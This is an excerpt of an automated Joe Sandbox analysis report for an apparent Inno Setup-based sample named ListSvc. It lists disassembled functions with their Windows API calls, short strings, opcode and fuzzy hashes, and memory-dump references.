Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad8bebb6b70c684c30d9747228a5e3f8ffc0963a0edfe972ae4d2d3d4fc87c04
Instruction ID: f6f51fa323c2004b4ed4a12cf3aa4c02228d8e81e9c13bd86265522dc6499af0
Opcode Fuzzy Hash: ad8bebb6b70c684c30d9747228a5e3f8ffc0963a0edfe972ae4d2d3d4fc87c04
Instruction Fuzzy Hash: B01172A160425956FF706A7A6F09BEA3F9C7FD1745F050429BE419B283CB38CC458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00423A20, Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A30
GetLastError.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A3F
GetFileAttributesW.KERNEL32(00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000), ref: 00423A47
RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A62
SetLastError.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A70

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
String ID:
API String ID: 2814369299-0
Opcode ID: 5cf6f583151de2db28f1a3568ac7f7c21abc363b183444b2113c2190a0e75535
Instruction ID: b6ddb16581f5c3c7179c90d7d3f79c6d55466118c1baf1b24a27a0798ed1e7de
Opcode Fuzzy Hash: 5cf6f583151de2db28f1a3568ac7f7c21abc363b183444b2113c2190a0e75535
Instruction Fuzzy Hash: FAF0A7613803241999203DBE28C9ABF115CC9427AFB54077FF994D22D2D62D5F87415D

Uniqueness

Uniqueness Score: -1.00%

Function 005B631C, Relevance: 7.5, APIs: 5, Instructions: 39threadCOMMON

Download Yara Rule

APIs

UnhookWindowsHookEx.USER32(00000000), ref: 005B632E
SetEvent.KERNEL32(00000000), ref: 005B635A
GetCurrentThreadId.KERNEL32 ref: 005B635F
MsgWaitForMultipleObjects.USER32 ref: 005B6388
CloseHandle.KERNEL32(00000000,00000000), ref: 005B6395

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
String ID:
API String ID: 2132507429-0
Opcode ID: 3d70fa8801357980af144d8f96a13d0436440f37400d9bd4b324e4fa6e60107c
Instruction ID: 777aa0f60006170efd8bf97b8faec0e2cbbea874aebe53a0ac6f8c30ff2fdbbe
Opcode Fuzzy Hash: 3d70fa8801357980af144d8f96a13d0436440f37400d9bd4b324e4fa6e60107c
Instruction Fuzzy Hash: 30018B70A09700EED700EB65DC45BAE37E9FB44715F604A2AF055C75D0DB38A480CB42

Uniqueness

Uniqueness Score: -1.00%

Function 006B8F64, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000,006B94CE,?,?), ref: 006B8FD4
SetFileAttributesW.KERNEL32(00000000,00000000,00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000,006B94CE), ref: 006B8FFD
MoveFileExW.KERNEL32(00000000,00000000,00000001,00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000), ref: 006B9016

Strings

isRS-%.3u.tmp, xrefs: 006B8FB3

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: File$Attributes$Move
String ID: isRS-%.3u.tmp
API String ID: 3839737484-3657609586
Opcode ID: f1af534764baa85caf1b981574ad6383839b7439e06e2967b69f80573a92c814
Instruction ID: 31d351f3c97924346b89867796ea0414510024315a00da88274a448b23120628
Opcode Fuzzy Hash: f1af534764baa85caf1b981574ad6383839b7439e06e2967b69f80573a92c814
Instruction Fuzzy Hash: AB318170D04218ABCB00EBB9C8859EEB7B9EF48314F51467EF814B7281D7385E818769

Uniqueness

Uniqueness Score: -1.00%

Function 0060C038, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32 ref: 0060C08C
GetLastError.KERNEL32(00000000,00000000,006D579C,?,?,XMb,00000000,>Mb,?,00000000,00000000,0060C0B2,?,?,00000000,00000001), ref: 0060C094

Strings

>Mb, xrefs: 0060C072, 0060C075
XMb, xrefs: 0060C07A, 0060C07D

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: CreateErrorLastProcess
String ID: >Mb$XMb
API String ID: 2919029540-2660256435
Opcode ID: cc071ed51034117dff2eb24da789fdfe7696ce97c15fb88c7d50c2d671ecce20
Instruction ID: 6fed8a1d79b3fe7fb7c31d778b9d5703ccb9eb2a1393ada51090ba1ca1dee2d9
Opcode Fuzzy Hash: cc071ed51034117dff2eb24da789fdfe7696ce97c15fb88c7d50c2d671ecce20
Instruction Fuzzy Hash: DA113972640208AFCB54DFA9DC81DDFB7ECEB4D320B518666F908D3280D635AE108BA4

Uniqueness

Uniqueness Score: -1.00%

Function 006B6998, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32 ref: 006B6A05
CloseHandle.KERNEL32(006B6AB0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,006B6A6C,?,006B6A5C,00000000), ref: 006B6A22

Part of subcall function 006B68EC: GetLastError.KERNEL32(00000000,006B6989,?,?,?), ref: 006B690F

Strings

D, xrefs: 006B69DF
(\m, xrefs: 006B6A0E

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: CloseCreateErrorHandleLastProcess
String ID: (\m$D
API String ID: 3798668922-1981685662
Opcode ID: a5833d7c80436315819c56a95c2be4cf65ccd9a37b43d1b18280e5cc74a4d4a7
Instruction ID: 5a29f4a3f67f8962990b16f59edcecd6c92ec2fdb2b6e45770094aa6b13b7383
Opcode Fuzzy Hash: a5833d7c80436315819c56a95c2be4cf65ccd9a37b43d1b18280e5cc74a4d4a7
Instruction Fuzzy Hash: 53115EB1604248AFDB00EBA5CC92EEE77ADEF08704F51407AF505F7281E678AE448768

Uniqueness

Uniqueness Score: -1.00%

Function 0062460C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005C52C8: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,006D579C,00000000,0060D8F7,00000000,0060DBD2,?,?,006D579C), ref: 005C52F9

LoadTypeLib.OLEAUT32(00000000,00000000), ref: 0062464F
RegisterTypeLib.OLEAUT32(?,00000000,00000000), ref: 0062466B

Strings

RegisterTypeLib, xrefs: 00624676
LoadTypeLib, xrefs: 0062465A

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: Type$FullLoadNamePathRegister
String ID: LoadTypeLib$RegisterTypeLib
API String ID: 4170313675-2435364021
Opcode ID: 4a5734cba4f1f567cfe39a2ea32e2412489323ff365467ecfcfbb8db8d726f7e
Instruction ID: a0643c8b31b351ed7dd0ed5e96a0399ab73b0cd2583ebe073036f576505b33dd
Opcode Fuzzy Hash: 4a5734cba4f1f567cfe39a2ea32e2412489323ff365467ecfcfbb8db8d726f7e
Instruction Fuzzy Hash: 2D0148317407146BDB10EBB6DC82F8E77EDDB49704F514876B400F62D2DE78AE058A58

Uniqueness

Uniqueness Score: -1.00%

Function 0060DAE9, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41fileCOMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0060DAF4

Part of subcall function 00423A20: DeleteFileW.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A30
Part of subcall function 00423A20: GetLastError.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A3F
Part of subcall function 00423A20: GetFileAttributesW.KERNEL32(00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000), ref: 00423A47
Part of subcall function 00423A20: RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A62

MoveFileW.KERNEL32(00000000,00000000), ref: 0060DB21

Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87

Strings

DeleteFile, xrefs: 0060DB05
MoveFile, xrefs: 0060DB2A

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: File$AttributesErrorLast$DeleteDirectoryMoveRemove
String ID: DeleteFile$MoveFile
API String ID: 3947864702-139070271
Opcode ID: 28384db22342baecc380df85cc8e828356bddb25a27468d4207e88f44f6ce01a
Instruction ID: fe212bc12655be3e3d7d94ed230904773b29f806c55adb2c37bf9887ca86c235
Opcode Fuzzy Hash: 28384db22342baecc380df85cc8e828356bddb25a27468d4207e88f44f6ce01a
Instruction Fuzzy Hash: 62F044706841058AEB08FBF6E9069AF73A5EF44318F51467EF404E72C1DA3C9C05862D

Uniqueness

Uniqueness Score: -1.00%

Function 004698FC, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00469A4C,?,?,00443D4C,00000001), ref: 0046998A

Part of subcall function 004236A4: CreateFileW.KERNEL32(00000000,000000F0,000000F0,00000000,00000003,00000080,00000000,?,?,00443D4C,004699CC,00000000,00469A4C,?,?,00443D4C), ref: 004236F3

Part of subcall function 00423BD0: GetFullPathNameW.KERNEL32(00000000,00000104,?,?,?,?,?,00443D4C,004699E7,00000000,00469A4C,?,?,00443D4C,00000001), ref: 00423BF3

GetLastError.KERNEL32(00000000,00469A4C,?,?,00443D4C,00000001), ref: 004699F1

Part of subcall function 00427D54: FormatMessageW.KERNEL32(00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,00443D4C,00000000,?,00469A00,00000000,00469A4C), ref: 00427D78
Part of subcall function 00427D54: LocalFree.KERNEL32(00000001,00427DD1,00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,00443D4C,00000000,?,00469A00,00000000,00469A4C), ref: 00427DC4

Strings

dUA, xrefs: 00469A10
\UA, xrefs: 004699A9

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: ErrorLast$CreateFileFormatFreeFullLocalMessageNamePath
String ID: \UA$dUA
API String ID: 503893064-3864016770
Opcode ID: 8f6538f2233dbe51c704c46e78bae72522b5131ed1e615a9c685bbd8288b59b5
Instruction ID: 123e0454fb2a9dec89cd9e8203dbd653fcf04e778e7e37e714b9737e464d7bf3
Opcode Fuzzy Hash: 8f6538f2233dbe51c704c46e78bae72522b5131ed1e615a9c685bbd8288b59b5
Instruction Fuzzy Hash: 8641A370B002599FDB00EFA6C8815EEBBF5AF58314F40812AE914A7382D77D5E05CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE74, Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON

Download Yara Rule

APIs

GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040DE85
SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040DEE3
SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040DF40
SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040DF73

Part of subcall function 0040DE30: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040DEF1), ref: 0040DE47
Part of subcall function 0040DE30: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040DEF1), ref: 0040DE64

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: Thread$LanguagesPreferred$Language
String ID:
API String ID: 2255706666-0
Opcode ID: 7b6831f497646e761f52de9c536b6e12a9bbcbfaf2b29159977432e5b56d760a
Instruction ID: 69b1dabfcf83cd92044bbbe7d095353c7cd2b80021ffbfb9d1b785f1729ac455
Opcode Fuzzy Hash: 7b6831f497646e761f52de9c536b6e12a9bbcbfaf2b29159977432e5b56d760a
Instruction Fuzzy Hash: 63317070E1021A9BCB10DFE9D884AAEB7B5FF14305F40417AE516FB2D1D7789A09CB94

Uniqueness

Uniqueness Score: -1.00%

Function 005B9590, Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 005B95A3
GetWindowLongW.USER32(?,000000EC), ref: 005B95E5
SetWindowLongW.USER32 ref: 005B95FF
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,C31852FF,?,00000000,?,005B96B9,?,?,?,00000000), ref: 005B9627

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: Window$Long$Visible
String ID:
API String ID: 2967648141-0
Opcode ID: b7a1436f9b319cac24e08ad551a1c75daf269ab9656b7f3b572d445cccf1e1b8
Instruction ID: de5a40ccb5800a4cef2b87037ee72a09c9fd5293aebedbf233be07227e7c069f
Opcode Fuzzy Hash: b7a1436f9b319cac24e08ad551a1c75daf269ab9656b7f3b572d445cccf1e1b8
Instruction Fuzzy Hash: B31161742851446FDB00DB28D888FFA7FE9AB45324F458191F988CB362CA38ED80CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0046A218, Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000,?,006D579C,?,?,006AC890), ref: 0046A22F
LoadResource.KERNEL32(?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000,?,006D579C,?), ref: 0046A249
SizeofResource.KERNEL32(?,0046A2B4,?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000), ref: 0046A263
LockResource.KERNEL32(00469B00,00000000,?,0046A2B4,?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000), ref: 0046A26D

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: c0a3742649e4821bf1d8e39dd4131d6b260b263a11f53cd498264533ba18d33a
Instruction ID: abb9b97bb193dfeb05d9d82a7f41705a61c143c3b7d9841fcbe573c2d8062a85
Opcode Fuzzy Hash: c0a3742649e4821bf1d8e39dd4131d6b260b263a11f53cd498264533ba18d33a
Instruction Fuzzy Hash: C4F081B36406046F5745EE9DA881DAB77ECEE89364310015FF908D7302EA39DD51477A

Uniqueness

Uniqueness Score: -1.00%

Function 0050E958, Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(00000000), ref: 0050E965
GetCurrentProcessId.KERNEL32(?,00000000,00000000,005BA39A,?,?,00000000,00000001,005B8697,?,00000000,00000000,00000000,00000001,?,00000000), ref: 0050E96E
GlobalFindAtomW.KERNEL32(00000000), ref: 0050E983
GetPropW.USER32 ref: 0050E99A

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

